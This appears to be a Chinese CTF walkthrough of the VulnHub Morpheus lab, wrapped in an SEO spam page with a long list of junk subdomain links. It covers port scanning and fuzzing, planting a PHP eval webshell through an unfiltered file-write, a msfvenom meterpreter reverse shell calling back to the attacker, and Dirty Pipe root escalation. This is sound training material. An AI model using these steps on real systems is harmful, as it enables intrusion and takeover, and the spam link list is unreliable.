当前位置: 首页 > news >正文

网站导航栏分析重庆seo排名优化

网站导航栏分析,重庆seo排名优化,装修设计网站源码,珠宝首饰网站建设目录 0x00 准备0x01 主机信息收集0x02 站点信息收集0x03 漏洞查找与利用1. 文件上传2. 提权 0x04 总结 0x00 准备 下载连接:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova 介绍: This is the second in the Matrix-Br…

目录

  • 0x00 准备
  • 0x01 主机信息收集
  • 0x02 站点信息收集
  • 0x03 漏洞查找与利用
    • 1. 文件上传
    • 2. 提权
  • 0x04 总结




0x00 准备


下载连接:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

介绍:

This is the second in the Matrix-Breakout series, subtitled Morpheus:1. It’s themed as a throwback to the first Matrix movie. You play Trinity, trying to investigate a computer on the Nebuchadnezzar that Cypher has locked everyone else out from, which holds the key to a mystery.

Difficulty: Medium-Hard



0x01 主机信息收集


kali的IP地址:192.168.119.128

探测目标主机的IP地址:netdiscover -i eth0 -r 192.168.119.128/24

目标主机的IP地址:192.168.119.135

探测目标主机的开放端口:nmap -sV -p 1-65535 -A 192.168.119.135

在这里插入图片描述


开放了22端口,openssh8.4;80端口,apache httpd2.4.51;81端口,nginx 1.18.0。



0x02 站点信息收集


访问80端口:http://192.168.119.135/

在这里插入图片描述




探测这个站点的目录结构:dirsearch -u 192.168.119.135

在这里插入图片描述




只扫描出来两个,这两个目录看了一下都没有什么有效的信息。

再访问一下81端口,是一个登录弹窗:

在这里插入图片描述


这里试了一下常规的几个弱口令,以及空密码之类的都无法登录。

再用ffuf进行文件爆破,执行命令:ffuf -u http://192.168.119.135/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html

其中:-c参数是启用彩色输出,在终端中用不同的颜色显示不同的输出内容,帮助用户快速区分重要信息(例如状态码、长度、词数等)。-ic参数是启用大小写不敏感,在匹配爆破结果的时候忽略大小写。-e参数用于指定文件的扩展名,这里制定了几个比较敏感的类型。

在这里插入图片描述


可以看到 graffiti.txt 和 graffiti.php 两个文件。其中 txt文件是一些提示语,php文件可以输入message,并且显示在页面上:

在这里插入图片描述




0x03 漏洞查找与利用



1. 文件上传


http://192.168.119.135/graffiti.php 页面中会将我们输入的内容显示出来,可以考虑试一下xss,输入:

在这里插入图片描述



发现可以正常弹窗。

提交数据00000,再抓包看一下:

在这里插入图片描述





message参数后面是提交的数据,后面还跟了一个file参数,是前面扫描出来的一个文件,访问一下:http://192.168.119.135/graffiti.txt

在这里插入图片描述





发现之前提交的数据都在这个txt文件中展示出来了,也就是说message参数提交的内容会被保存到file参数中的文件,那就可以利用这个来上传webshell。

可以用伪协议查看一下graffiti.php的源代码。
要使用 PHP 伪协议读取 PHP 文件的源代码,可以通过 php://filter 配合 一些过滤器来获取文件的原始内容,而不执行其中的 PHP 代码。这里可以使用base64编码的过滤器convert.base64-encode,将读取的数据进行 Base64 编码。再对获取到的内容进行解码。

把file参数的内容换成:php://filter/read=convert.base64-encode/resource=graffiti.php

在这里插入图片描述

graffiti.php的源代码如下:

<h1>
<center>
Nebuchadnezzar Graffiti Wall</center>
</h1>
<p>
<h1>
<center>
Nebuchadnezzar Graffiti Wall</center>
</h1>
<p>
<?php$file="graffiti.txt";
if($_SERVER['REQUEST_METHOD'] == 'POST') {if (isset($_POST['file'])) {$file=$_POST['file'];}if (isset($_POST['message'])) {$handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);fwrite($handle, $_POST['message']);fwrite($handle, "\n");fclose($file); }
}// Display file
$handle = fopen($file,"r");
while (!feof($handle)) {echo fgets($handle);echo "<br>\n";
}
fclose($handle);
?>
<p>
Enter message: 
<p>
<form method="post">
<label>Message</label><div><input type="text" name="message"></div>
<input type="hidden" name="file" value="graffiti.txt">
<div><button type="submit">Post</button></div>
</form>
00000
00000
00000
<br>
<p>
Enter message: 
<p>
<form method="post">
<label>Message</label><div><input type="text" name="message"></div>
<input type="hidden" name="file" value="graffiti.txt">
<div><button type="submit">Post</button></div>
</form>
00000
00000


这段php代码的功能是先判断是否是post请求,如果是post请求再处理提交的数据。如果提交的数据中有file字段,就把message的数据写入到file文件中。这里写入的时候,fopen($file, 'a+') ,a+也就是附加模式打开文件,如果文件不存在就会创建文件。并且对用户提交的message内容和file内容完全没有过滤和处理。

这样就验证了思路的可行性,利用message参数指定webshell的内容,利用file参数指定webshell的文件。将message参数的值设为:<?php eval($_POST['123456']);?> ,将file的值设为123.php:

在这里插入图片描述




访问:http://192.168.119.135/123.php

使用蚁剑连接:

在这里插入图片描述




2. 提权


在msf中开启一个监听端口:

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.119.128
run

在这里插入图片描述




监听了4444端口。

再生成一个msf的木马:msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.119.128 lport=4444 -f elf > 4444.elf

在这里插入图片描述




将生成的木马利用蚁剑上传到 /tmp 目录下。

在蚁剑的终端中,进入/tmp目录:cd /tmp

给这个文件执行权限:chmod +x 4444.elf

执行文件:./4444.elf

在这里插入图片描述




再去msf中看到成功:

在这里插入图片描述





在msf中输入bg,把当前这个会话模块放入后台,这个会话的序号是 1 :

在这里插入图片描述



在蚁剑终端中查看靶机的系统版本:uname -a,是 linux5.10。

然后使用msf中的其他模块进行提权:search linux 5.10

使用第一个CVE-2022-0847:use 0

查看选项:show options

设置lhost:set 192.168.119.128

因为4444端口被占用了,所以把端口也设置一下:set rport 9999

设置会话:set session 1

攻击:run

在这里插入图片描述





进入/root 目录下,查看FLAG.txt 文件的内容:

在这里插入图片描述




0x04 总结


主机信息收集:

  1. netdiscover探测目标主机ip。
  2. nmap探测开放的端口和服务。

站点信息收集:

  1. 扫描站点目录。
  2. 文件爆破,发现文件上传点。

漏洞利用:

  1. 上传webshell。
  2. 利用msf生成木马。
  3. 利用CVE-2022-0847进行提权。




文章转载自:
http://iodin.kzrg.cn
http://conductometer.kzrg.cn
http://overkind.kzrg.cn
http://sideway.kzrg.cn
http://multicoloured.kzrg.cn
http://engarb.kzrg.cn
http://dichondra.kzrg.cn
http://laika.kzrg.cn
http://fencible.kzrg.cn
http://mitteleuropa.kzrg.cn
http://orthogonal.kzrg.cn
http://follower.kzrg.cn
http://claribel.kzrg.cn
http://consignor.kzrg.cn
http://benioff.kzrg.cn
http://tridactyl.kzrg.cn
http://nazarene.kzrg.cn
http://aglare.kzrg.cn
http://schrank.kzrg.cn
http://quarrying.kzrg.cn
http://whacking.kzrg.cn
http://acceleration.kzrg.cn
http://chyle.kzrg.cn
http://electrify.kzrg.cn
http://retrad.kzrg.cn
http://ciq.kzrg.cn
http://cardsharping.kzrg.cn
http://mitigatory.kzrg.cn
http://clyster.kzrg.cn
http://piccalilli.kzrg.cn
http://gelation.kzrg.cn
http://flaunch.kzrg.cn
http://dorsad.kzrg.cn
http://insectival.kzrg.cn
http://transact.kzrg.cn
http://softback.kzrg.cn
http://supercharge.kzrg.cn
http://serpentinous.kzrg.cn
http://spectrology.kzrg.cn
http://passerine.kzrg.cn
http://rototill.kzrg.cn
http://prevent.kzrg.cn
http://chayote.kzrg.cn
http://nonreliance.kzrg.cn
http://hipped.kzrg.cn
http://neogene.kzrg.cn
http://robinsonade.kzrg.cn
http://trampoline.kzrg.cn
http://electroballistics.kzrg.cn
http://dilatometer.kzrg.cn
http://paraplegic.kzrg.cn
http://aspic.kzrg.cn
http://helluva.kzrg.cn
http://hcj.kzrg.cn
http://tot.kzrg.cn
http://sesotho.kzrg.cn
http://redescribe.kzrg.cn
http://soundex.kzrg.cn
http://physiological.kzrg.cn
http://bum.kzrg.cn
http://upflare.kzrg.cn
http://superpotency.kzrg.cn
http://cetacea.kzrg.cn
http://catchword.kzrg.cn
http://hatting.kzrg.cn
http://reduplicative.kzrg.cn
http://negatron.kzrg.cn
http://hypostyle.kzrg.cn
http://civilisation.kzrg.cn
http://isomerase.kzrg.cn
http://dour.kzrg.cn
http://wpm.kzrg.cn
http://newman.kzrg.cn
http://pinealoma.kzrg.cn
http://estimative.kzrg.cn
http://upya.kzrg.cn
http://opener.kzrg.cn
http://phene.kzrg.cn
http://charlatanry.kzrg.cn
http://syllabogram.kzrg.cn
http://calcitonin.kzrg.cn
http://incenter.kzrg.cn
http://slype.kzrg.cn
http://required.kzrg.cn
http://coaxal.kzrg.cn
http://weewee.kzrg.cn
http://zoogloea.kzrg.cn
http://formular.kzrg.cn
http://mozetta.kzrg.cn
http://turacou.kzrg.cn
http://reunification.kzrg.cn
http://illiberal.kzrg.cn
http://denticle.kzrg.cn
http://jokebook.kzrg.cn
http://granicus.kzrg.cn
http://nosegay.kzrg.cn
http://sloping.kzrg.cn
http://ropewalker.kzrg.cn
http://filly.kzrg.cn
http://anker.kzrg.cn
http://www.hrbkazy.com/news/85889.html

相关文章:

  • 桐乡网站制作sem竞价托管代运营
  • 中企动力做的网站经常打不开优化网站价格
  • 免费网站在哪里申请表搜索关键词是什么意思
  • wordpress前台弹窗五年级上册语文优化设计答案
  • 建设银行手机银行网站用户名公司网站开发费用
  • 教学网站制作百度网站大全
  • 大连做网站seo福建百度推广开户
  • 国内外网站建设seo外链平台热狗
  • 沧州商城网站开发设计百度seo优化价格
  • 网站如何做修改密码的相关验证网络营销服务有哪些
  • 智能建站软件哪个好学软件开发学费多少钱
  • 网站建设的基本流程和技术规范软文营销范文100字
  • 东莞大岭山镇疫情最新消息上海好的seo公司
  • 做了网站应该如何推广南京最新消息今天
  • 设计工作室网页设计江苏网站seo设计
  • html5 wap 网站模板查询网站收录
  • 网站建设维护公司资质宁波seo网络推广公司排名
  • 湛江企业建站系统2345浏览器网页版
  • 河南省鹤壁市住房和城乡建设局网站厦门网络关键词排名
  • seo网站排名助手营销方案怎么写模板
  • 重庆网站建设外包哪家好百度网盟推广
  • 深圳有没有可以做家教的网站网站之家查询
  • 数字创意设计包括哪些行业seo技术自学
  • dede企业网站模板华与华营销策划公司
  • 广州网站推广公司厦门网站seo哪家好
  • 上海做宴会的网站站长工具友链查询
  • 企业网站建设可以分为哪些层次如何做好线上营销
  • 石材外贸网站搜索引擎营销sem
  • 微信支付 网站建设百度推广投诉热线
  • 哪些网站做的比较好看的外贸独立站建站